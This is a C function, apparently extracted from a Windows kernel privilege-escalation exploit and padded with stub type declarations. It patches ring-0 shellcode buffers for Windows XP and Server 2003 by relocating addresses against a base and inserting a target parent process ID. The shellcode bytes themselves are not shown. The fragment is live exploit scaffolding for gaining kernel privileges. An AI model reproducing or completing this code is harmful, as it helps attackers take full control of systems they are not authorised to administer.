
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ PVOID ;
typedef int* PDWORD ;
typedef int * PCHAR ;
typedef int DWORD ;


 int EXIT_FAILURE ;
 int GetVersion () ;
 scalar_t__ HIBYTE (int ) ;
 scalar_t__ LOBYTE (int ) ;
 int LOWORD (int) ;
 int exit (int ) ;
 int fprintf (int ,char*) ;
 int stderr ;
 int * win2k3_ring0_shell ;
 int * win32_fixup ;
 int * win32_ret ;
 int * winxp_ring0_shell ;

__attribute__((used)) static PCHAR
fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
{
  DWORD dwVersion, dwMajorVersion, dwMinorVersion;

  dwVersion = GetVersion ();
  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

  if (dwMajorVersion != 5)
    {
      fprintf (stderr, "* GetVersion, unsupported version\n");
      exit (EXIT_FAILURE);
    }

  *(PDWORD) &win32_fixup[5] += (DWORD) base;
  *(PDWORD) &win32_fixup[22] += (DWORD) base;
  *(PDWORD) &win32_fixup[26] += (DWORD) base;
  *(PDWORD) &win32_fixup[30] += (DWORD) base;
  *(PDWORD) &win32_fixup[34] += (DWORD) base;

  *(PDWORD) &win32_ret[4] += (DWORD) base;

  switch (dwMinorVersion)
    {
      case 1:
        *zlen = sizeof winxp_ring0_shell - 1;
        *(PDWORD) &winxp_ring0_shell[55] = ppid;
        return (winxp_ring0_shell);

      case 2:
        *zlen = sizeof win2k3_ring0_shell - 1;
        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
        return (win2k3_ring0_shell);

      default:
        fprintf (stderr, "* GetVersion, unsupported version\n");
        exit (EXIT_FAILURE);
    }

  return (((void*)0));
}
